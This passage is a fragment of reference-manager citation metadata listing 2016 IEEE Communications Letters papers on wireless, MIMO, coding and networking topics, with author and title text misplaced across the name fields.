https://doi.org/10.1109/LCOMM.2016.2532884","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, L., Wang, Z., Huang, Q., &amp; Zhang","given":"M. (2016). Balanced Gray Codes With Flexible Lengths. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2501291","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xu, C., Zheng, M., Liang, W., Yu, H., &amp; Liang","given":"Y. C. (2016). Outage Performance of Underlay Multihop Cognitive Relay Networks With Energy Harvesting. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2547985","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pitarokoilis, A., Bj&amp;#x00F6;rnson, E., &amp; Larsson","given":"E. G. (2016). Performance of the Massive MIMO Uplink With OFDM and Phase Noise. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2581169","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Huang, G., &amp; Tang","given":"D. (2016). Wireless Information and Power Transfer in Two-Way OFDM Amplify-and-Forward Relay Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2570751","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vizziello, A., Savazzi, P., &amp; Borra","given":"R. (2016). Joint Phase Recovery for XPIC System Exploiting Adaptive Kalman Filtering. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2542798","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ge, X., Jin, H., Cheng, J., &amp; Leung","given":"V. C. M. (2016). On Fair Resource Sharing in Downlink Coordinated Multi-Point Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553033","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yuan, Y., Zhao, P., Wang, B., &amp; Wu","given":"B. (2016). Hybrid Maximum Likelihood Modulation Classification for Continuous Phase Modulations. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517007","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Joung","given":"J. (2016). User Assignment Algorithms for Energy-Efficiency-Aware Multiple Access Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2575831","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pan, S., Zhou, Y., Yu, F., Qian, F., &amp; Hu","given":"G. (2016). Network Topology Tomography Under Multipath Routing. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516531","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ramanan, S. V, &amp; Giridhar","given":"K. (2016). On the Dependence Between User Detection and Timing Advancement in LTE Ranging Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2563419","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Genc, G., Kara, Y. E., Yilmaz, H. B., &amp; Tugcu","given":"T. (2016). ISI-Aware Modeling and Achievable Rate Analysis of the Diffusion Channel. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2586069","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chiang, T. W., &amp; Lee","given":"J. H. (2016). Lower Bound for Finite-SNR DMT With Position Estimation Errors in MIMO Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578926","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, H., Zhu, J., Wang, Q., Zhou, T., Qiu, H., &amp; Li","given":"H. (2016). LAAEM: A Method to Enhance LDoS Attack. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2532330","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, S., Shin, Y., Kim, J. Y., &amp; Kim","given":"D. I. (2016). Probability of Packet Loss in Energy Harvesting Nodes With Cognitive Radio Capabilities. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539158","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Burmester, M., &amp; Munilla","given":"J. (2016). Tag Memory-Erasure Tradeoff of RFID Grouping Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546857","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu","given":"X. (2016). Closed Form of Distribution Functions for Uplink Transmissions in Cloud Radio Access Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2586039","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu","given":"Y. (2016). Optimal Mode Selection in D2D-Enabled Multibase Station Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2514100","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Qi, M., Xiong, S., Yuan, J., Rao, W., &amp; Zhong","given":"L. (2016). On Some New Families of Almost Difference Sets Constructed From Cyclotomic Classes of Order 12. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503279","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Valls, V., Garcia-Saavedra, A., Costa, X., &amp; Leith","given":"D. J. (2016). Maximizing LTE Capacity in Unlicensed Bands (LTE-U/LAA) While Fairly Coexisting With 802.11 WLANs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557320","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ma, Q., Xiao, Y., Dan, L., Yang, P., Peng, L., &amp; Li","given":"S. (2016). Subcarrier Allocation for OFDM With Index Modulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560171","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, J., Yang, Q., Shen, Z., &amp; Kwak","given":"K. S. (2016). Suboptimal Online Resource Allocation in Hybrid Energy Supplied OFDMA Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2575834","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wen, Z., Liu, X., Beaulieu, N. C., Wang, R., &amp; Wang","given":"S. (2016). Joint Source and Relay Beamforming Design for Full-Duplex MIMO AF Relay SWIPT Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2513768","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, B. C., &amp; Yu","given":"S. Z. (2016). Keyword Mining for Private Protocols Tunneled Over WebSocket. IEEE Communications Letters. etc. https://doi.org/10.1109/LCOMM.2016.2565465","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Moualeu, J. M., Hamouda, W., &amp; Takawira","given":"F. (2016). Performance of AF Relay Selection With Outdated Channel Estimates in Spectrum-Sharing Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585492","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cai, H. B., Zhang, J., Zhu, Y. J., Zhang, J. K., &amp; Yang","given":"X. (2016). Optimal Constellation Design for Indoor &lt;inline-formula&gt; &lt;img src=“/images/tex/30425.gif” alt=“2\\times 2”&gt; &lt;/inline-formula&gt; MIMO Visible Light Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2512601","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, C., Cheng, P., Chen, Z., Zhang, J. A., Xiao, Y., &amp; Gui","given":"L. (2016). Near-ML Low-Complexity Detection for Generalized Spatial Modulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516542","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Domingo-Prieto, M., Chang, T., Vilajosana, X., &amp; Watteyne","given":"T. (2016). Distributed PID-Based Scheduling for 6TiSCH Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546880","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, Y., Wang, L., Zhao, Z., Ma, M., &amp; Jiao","given":"B. (2016). Secure Multiuser MIMO Downlink Transmission Via Precoding-Aided Spatial Modulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2549014","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kim, H., Kim, M., Lee, H., &amp; Kim","given":"J. (2016). Lattice-Reduction-Aided Partial Marginalization for Soft Output MIMO Detector With Fixed and Reduced Complexity. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2543700","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ashraf, M., Shahid, A., Yeo, W. Y., &amp; Lee","given":"K. G. (2016). Comments on &amp;#x201C;Low-Complexity Power Allocation for Energy Efficiency Maximization in DAS&amp;#x201D; and a Novel Algorithm for Energy Efficiency Maximization in DAS. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525985","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, W., Jin, S., Wen, C. K., Matthaiou, M., &amp; You","given":"X. (2016). A Tractable Approach to Uplink Spectral Efficiency of Two-Tier Massive MIMO Cellular HetNets. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503758","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Singh, S., Geraseminko, M., Yeh, S. p., Himayat, N., &amp; Talwar","given":"S. (2016). Proportional Fair Traffic Splitting and Aggregation in Heterogeneous Wireless Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2547418","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cao, K., &amp; Gao","given":"X. (2016). Solutions to Generalized Integrals Involving the Generalized Marcum &lt;inline-formula&gt; &lt;img src=“/images/tex/25954.gif” alt=“{Q}”&gt; &lt;/inline-formula&gt;-Function With Application to Energy Detection. IEEE Communications Letters. https://doi.org/10.11","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Dai, M., &amp; Clerckx","given":"B. (2016). Hybrid Precoding for Physical Layer Multicasting. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503273","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Su, J., Sheng, Z., Hong, D., &amp; Wen","given":"G. (2016). An Effective Frame Breaking Policy for Dynamic Framed Slotted Aloha in RFID. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521839","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nobar, S. K., Mehr, K. A., &amp; Niya","given":"J. M. (2016). RF-Powered Green Cognitive Radio Networks: Architecture and Performance Analysis. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2500897","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alotaibi, E. R., &amp; Hamdi","given":"K. A. (2016). Secure Relaying in Multihop Communication Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550025","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yin, S., &amp; Qu, Z. (2016). Resource Allocation in Multiuser OFDM Systems With Wireless Information and Power Transfer. IEEE Communications Letters, 20(3)","given":"594–597. https://doi.org/10.1109/LCOMM.2016.2516999","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, Y., &amp; Chen","given":"X. (2016). Robust Beamforming and Power Splitting for Secrecy Wireless Information and Power Transfer in Cognitive Relay Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553019","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chatziantoniou, E., Crawford, J., &amp; Ko","given":"Y. (2016). Performance Analysis of a Low-Complexity Detector for MCIK-OFDM Over TWDP Fading. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2551216","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, J., Tang, X., &amp; Xiang, W. (2016). A New Construction of &lt;inline-formula&gt; &lt;img src=“/images/tex/40921.gif” alt=“(k+2","given":"k)”&gt; &lt;/inline-formula&gt; Minimal Storage Regenerating Code Over F3 With Optimal Access Property for All Nodes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564382","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Moazzeni","given":"T. (2016). On the Compactness of OFDM and Hermite Signals. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560821","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yu, P., Peng, H., &amp; Li","given":"J. (2016). On Blind Recognition of Channel Codes Within a Candidate Set. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525759","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhu, X., Wang, Z., Dai, L., &amp; Wang","given":"Q. (2016). Adaptive Hybrid Precoding for Multiuser Massive MIMO. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2532334","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shuminoski, T., &amp; Janevski","given":"T. (2016). Lyapunov Optimization Framework for 5G Mobile Nodes With Multi-Homing. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2540622","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, B., Zeng, Z., Beaulieu, N. C., &amp; Zhang","given":"T. (2016). Wireless Energy Transfer Beamforming With L&amp;#x00F6;wner-John Ellipsoidal Approximation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2572682","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chattha, J., &amp; Uppal","given":"M. (2016). Layered Multiplexed-Coded Relaying in Wireless Multicast Using QAM Transmissions. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2530059","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhu, J., &amp; Xu","given":"W. (2016). Securing Massive MIMO Via Power Scaling. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2532328","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, Y. Y., Yu, H. Y., Zhang, J. K., Zhu, Y. J., Wang, J. L., &amp; Ji","given":"X. S. (2016). On the Optimality of Spatial Repetition Coding for MIMO Optical Wireless Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2537322","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, C., Ma, M., Yang, Y., &amp; Jiao","given":"B. (2016). Optimal Spatial-Domain Design for Spatial Modulation Capacity Maximization. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550427","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tian, X., Li, M., Ti, G., &amp; Liu","given":"W. (2016). Fast Detection of Orthogonal Space-Time Block Codes With Unknown Channel. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2591548","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mu&amp;#x00F1;oz, P., Barco, R., Serrano, I., &amp; G&amp;#x00F3;mez-Andrades","given":"A. (2016). Correlation-Based Time-Series Analysis for Cell Degradation Detection in SON. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516004","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, Z., Jin, F., Luo, J., Fu, Y., Shan, J., &amp; Hu","given":"G. (2016). A Graph-Based Satellite Handover Framework for LEO Satellite Communication Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2569099","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, Y., Elkashlan, M., Ding, Z., &amp; Karagiannidis","given":"G. K. (2016). Fairness of User Clustering in MIMO Non-Orthogonal Multiple Access Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2559459","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vu, T. X., Nguyen, T. V, &amp; Quek","given":"T. Q. S. (2016). Power Optimization With BLER Constraint for Wireless Fronthauls in C-RAN. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509072","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Korki, M., Zayyani, H., &amp; Zhang","given":"J. (2016). Bayesian Hypothesis Testing for Block Sparse Signal Recovery. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518169","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jain, A., &amp; Krishnamurthy","given":"P. K. (2016). Phase Noise Tracking and Compensation in Coherent Optical Systems Using Kalman Filter. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550429","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, K., Li, B., Shen, H., Jin, J., &amp; Tse","given":"D. (2016). Reduce the Complexity of List Decoding of Polar Codes by Tree-Pruning. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2506568","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cello, M., Marchese, M., &amp; Mongelli","given":"M. (2016). On the QoS Estimation in an OpenFlow Network: The Packet Loss Case. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516537","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, P., Liu, Y., Wu, F., Liu, S., &amp; Tang","given":"B. (2016). Low-Overhead and High-Precision Prediction Model for Content-Based Sensor Search in the Internet of Things. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521735","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gao, X., Dai, L., Chen, Z., Wang, Z., &amp; Zhang","given":"Z. (2016). Near-Optimal Beam Selection for Beamspace MmWave Massive MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2544937","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sharma, V., Bennis, M., &amp; Kumar","given":"R. (2016). UAV-Assisted Heterogeneous Networks for Capacity Enhancement. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553103","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zamani, H., Zayyani, H., &amp; Marvasti","given":"F. (2016). An Iterative Dictionary Learning-Based Algorithm for DOA Estimation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2587674","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kang, J. M., &amp; Kim","given":"H. M. (2016). Training Designs for Estimation of Spatially Correlated Fading Channels in MIMO Amplify-and-Forward Two-Way Multi-Relay Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2502946","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao, S., &amp; Ma","given":"X. (2016). Construction of High-Performance Array-Based Non-Binary LDPC Codes With Moderate Rates. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2494581","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gohar, M., &amp; Choi","given":"J. G. (2016). Enhanced Mobility Management Scheme in PMIP-SAE-Based Mobile Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521645","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Rostami, S., Arshad, K., &amp; Rapajic","given":"P. (2016). Energy-Efficient Resource Allocation for LTE-A Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2562106","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Islam, S. M. R., &amp; Kwak","given":"K. S. (2016). Two-Stage Channel Estimation With Estimated Windowing for MB-OFDM UWB System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499745","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gaafar, M., Amin, O., Ikhlef, A., Chaaban, A., &amp; Alouini","given":"M. S. (2016). On Alternate Relaying With Improper Gaussian Signaling. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2577029","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lyu, X., &amp; Tian","given":"H. (2016). Adaptive Receding Horizon Offloading Strategy Under Dynamic Environment. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2531047","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vafi, S., &amp; Majid","given":"N. R. (2016). A Lower Bound for Burst Error Correcting Capability of Low Rate Binary Cyclic Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497341","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"RezaeiTabar, A. H., Diyanat, A., &amp; Khonsari","given":"A. (2016). On the Perfect Privacy: A Statistical Analysis of Network Traffic Approach. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558182","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Balevi, E., &amp; Y&amp;#x03B9;lmaz","given":"A. &amp;#x00D6; (2016). Analysis of Frequency Domain Oversampled MMSE SC-FDE. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504927","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhou, S., Alfano, G., Chiasserini, C. F., &amp; Nordio","given":"A. (2016). MIMO Relay Network With Precoding. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2510647","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zu, K., M&amp;#x00FC;ller, F. C. B. F., Lu, C., Eriksson, P. E., &amp; Klautau","given":"A. (2016). Rate Balancing Based Tomlinson&amp;#x2013;Harashima Precoding for G.Fast Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2575821","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shieh, S. L., Lin, C. H., Huang, Y. C., &amp; Wang","given":"C. L. (2016). On Gray Labeling for Downlink Non-Orthogonal Multiple Access Without SIC. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2584040","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Babar, Z., Botsinis, P., Alanis, D., Ng, S. X., &amp; Hanzo","given":"L. (2016). Construction of Quantum LDPC Codes From Classical Row-Circulant QC-LDPCs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2494020","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bilim, M., Kapucu, N., &amp; Develi","given":"I. (2016). A Closed-Form Approximate BEP Expression for Cooperative IDMA Systems over Multipath Nakagami-&lt;inline-formula&gt; &lt;img src=“/images/tex/21177.gif” alt=“m”&gt; &lt;/inline-formula&gt; Fading Channels. IEEE Communications Letters. https://doi.org/10.1109/LCO","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yoo, S., Kim, S., Yi, J., Son, Y., &amp; Choi","given":"S. (2016). ProCCA: Protective Clear Channel Assessment in IEEE 802.11 WLANs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2535130","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jiang, L., Tian, H., Qin, C., Gjessing, S., &amp; Zhang","given":"Y. (2016). Secure Beamforming in Wireless-Powered Cooperative Cognitive Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2514353","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Su&amp;#x0142;ek","given":"W. (2016). Nonbinary Quasi-Regular QC-LDPC Codes Derived From Cycle Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2584069","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"D&amp;#x00FC;zenli, T., &amp; Akay","given":"O. (2016). A New Spectrum Sensing Strategy for Dynamic Primary Users in Cognitive Radio. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2527640","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kuppusamy, M. R., Bokhari, S. M., &amp; Anjaneyalu","given":"B. M. (2016). Error Vector Magnitude (EVM)-Based Constellation Combiner for Cooperative Relay Network. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504374","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liao, J., Khandaker, M. R. A., &amp; Wong","given":"K. K. (2016). Robust Power-Splitting SWIPT Beamforming for Broadcast Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498928","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Anand, K., Gunawan, E., &amp; Guan","given":"Y. L. (2016). Degrees of Freedom of Three-User SISO-X Networks With Hybrid CSI at the Transmitters. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546253","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tamoor-ul-Hassan, S., Bennis, M., Nardelli, P. H. J., &amp; Latva-aho","given":"M. (2016). Caching in Wireless Small Cell Networks: A Storage-Bandwidth Tradeoff. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2543698","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, Y., Wang, H. M., Yang, Q., &amp; Ding","given":"Z. (2016). Secrecy Sum Rate Maximization in Non-orthogonal Multiple Access. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539162","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mumtaz, S., Al-Dulaimi, A., Huq, K. M. S., Saghezchi, F. B., &amp; Rodriguez","given":"J. (2016). WiFi in Licensed Band. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2581160","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chin, K. W., Wang, L., &amp; Soh","given":"S. (2016). Joint Routing and Links Scheduling in Two-Tier Multi-Hop RF-Energy Harvesting Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2590463","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao, L., Chi, X., &amp; Shi","given":"W. (2016). A QoS-Driven Random Access Algorithm for MPR-Capable VLC System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553661","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xie, Y., Yang, L., &amp; Yuan","given":"J. (2016). &lt;italic&gt;q&lt;/italic&gt;-Ary Chain-Containing Quantum Synchronizable Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2512261","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shajaiah, H., Abdelhadi, A., &amp; Clancy","given":"T. C. (2016). Towards an Application-Aware Resource Scheduling With Carrier Aggregation in Cellular Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2495294","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jiang, Z., &amp; Cao","given":"S. (2016). A Novel TLS-Based Antenna Reciprocity Calibration Scheme in TDD MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2586040","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, K., Chen, L., Yu, J., &amp; Zhang","given":"D. (2016). Optimality of Myopic Policy for Multistate Channel Access. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503770","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Orfanus, D., Freitas, E. P. de, &amp; Eliassen","given":"F. (2016). Self-Organization as a Supporting Paradigm for Military UAV Relay Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2524405","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Cheng, X., Lou, N., &amp; Yuan","given":"B. (2016). Iterative Decision-Aided Compensation of Phase Noise in Millimeter-Wave SC-FDE Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2542127","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Karlsson, C., &amp; Mitrokotsa","given":"A. (2016). Grouping-Proof-Distance-Bounding Protocols: Keep All Your Friends Close. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2562618","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shin, S., Lee, U., Dressler, F., &amp; Yoon","given":"H. (2016). Analysis of Cell Sojourn Time in Heterogeneous Networks With Small Cells. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516003","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tian, Y., Nix, A. R., &amp; Beach","given":"M. (2016). On the Performance of Opportunistic NOMA in Downlink CoMP Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2545672","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, S., Xiang, W., Wang, Z., Li, D., &amp; Guo","given":"Q. (2016). Staged Growth Codes: Intermediate Performance and Overhead Analysis. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2576443","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Falsafain, H., &amp; Mousavi","given":"S. R. (2016). A Generator-Matrix-Based Approach for Adaptively Generating Cut-Inducing Redundant Parity Checks. IEEE Communications Letters. 